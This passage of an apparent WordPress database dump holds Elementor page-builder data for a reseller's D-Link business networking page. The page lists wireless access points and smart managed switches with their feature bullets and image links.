Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7325,3375,'_elementor_version','2.5.14'),(7326,3375,'_elementor_edit_mode','builder'),(7329,3376,'_wp_page_template','template-fullwidth.php'),(7330,3376,'_elementor_template_type','post'),(7331,3376,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"219\",\"right\":\"219\",\"bottom\":\"219\",\"left\":\"219\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"80\",\"bottom\":\"80\",\"left\":\"80\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access 